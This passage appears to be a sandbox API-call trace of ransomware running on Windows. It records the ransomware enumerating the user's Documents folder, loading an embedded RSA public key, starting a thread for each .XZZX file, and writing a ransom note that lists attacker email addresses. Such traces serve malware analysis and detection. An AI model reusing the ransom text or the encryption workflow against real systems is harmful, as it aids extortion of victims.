lpSrch="ntdetect.com") returned 0x0 [0104.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0104.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0104.432] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0104.432] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.432] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D4132CC416066089C413F0DC1A1E44D1.XZZX" | out: lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX") returned="D4132CC416066089C413F0DC1A1E44D1.XZZX" [0104.432] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.432] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x370 [0104.432] Sleep (dwMilliseconds=0x96) [0104.588] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0104.588] lstrcmpW (lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpString2="..") returned 1 [0104.588] lstrcmpW (lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpString2=".") returned 1 [0104.588] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0104.588] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="ntldr") returned 0x0 [0104.588] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="NTLDR") returned 0x0 [0104.588] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0104.588] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="ntdetect.com") returned 0x0 [0104.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0104.588] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0104.588] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0104.588] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.588] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" | out: lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" [0104.588] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.588] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x374 [0104.589] Sleep (dwMilliseconds=0x96) [0104.744] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0104.744] lstrcmpW (lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX", lpString2="..") returned 1 [0104.744] lstrcmpW (lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX", lpString2=".") returned 1 [0104.744] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0104.744] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="ntldr") returned 0x0 [0104.744] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="NTLDR") returned 0x0 [0104.744] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0104.744] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="ntdetect.com") returned 0x0 [0104.744] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0104.744] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0104.744] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0104.744] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.744] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D8B4FBC032E124E029E6603236DA0928.XZZX" | out: lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX") returned="D8B4FBC032E124E029E6603236DA0928.XZZX" [0104.744] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.744] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x378 [0104.745] Sleep (dwMilliseconds=0x96) [0104.900] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0104.900] lstrcmpW (lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX", lpString2="..") returned 1 [0104.900] lstrcmpW (lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX", lpString2=".") returned 1 [0104.900] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0104.900] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="ntldr") returned 0x0 [0104.900] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="NTLDR") returned 0x0 [0104.900] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0104.900] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="ntdetect.com") returned 0x0 [0104.900] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0104.900] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0104.900] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0104.900] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.900] lstrcpyW (in: lpString1=0x17cf1c, lpString2="E1CB2DE23002B20E4903A282342F9656.XZZX" | out: lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX") returned="E1CB2DE23002B20E4903A282342F9656.XZZX" [0104.900] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.900] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x37c [0104.901] Sleep (dwMilliseconds=0x96) [0105.056] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.056] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.056] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.056] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.056] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.056] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.056] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.056] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0105.056] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0105.056] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0105.056] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0105.056] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0105.056] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0105.057] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0105.057] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0105.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0105.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0105.057] SetErrorMode (uMode=0x1) returned 0x1 [0105.057] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_HELP_INSTRUCTION.TXT") returned 61 [0105.057] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0105.057] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0105.057] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x380) returned 0x0 [0105.057] RegQueryValueExW (in: hKey=0x380, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb4960, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cb4960*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0105.057] RegCloseKey (hKey=0x380) returned 0x0 [0105.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0105.057] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0105.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0105.058] CloseHandle (hObject=0x380) returned 1 [0105.059] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0105.059] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="Documents" [0105.059] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0105.059] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0105.059] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0105.059] lstrcmpW (lpString1="lhhNd9leW5xmlXw00JFa", lpString2="..") returned 1 [0105.059] lstrcmpW (lpString1="lhhNd9leW5xmlXw00JFa", lpString2=".") returned 1 [0105.059] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0105.059] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0105.059] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0105.059] SetErrorMode (uMode=0x1) returned 0x1 [0105.059] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0105.059] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.059] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.060] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*" [0105.060] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0105.060] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0105.060] lstrcpyW (in: lpString1=0x17b644, lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0105.060] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0105.060] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0105.060] lstrcmpW (lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpString2="..") returned 1 [0105.061] lstrcmpW (lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpString2=".") returned 1 [0105.061] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0105.061] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="ntldr") returned 0x0 [0105.061] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="NTLDR") returned 0x0 [0105.061] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0105.061] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="ntdetect.com") returned 0x0 [0105.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0105.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0105.061] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0105.061] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 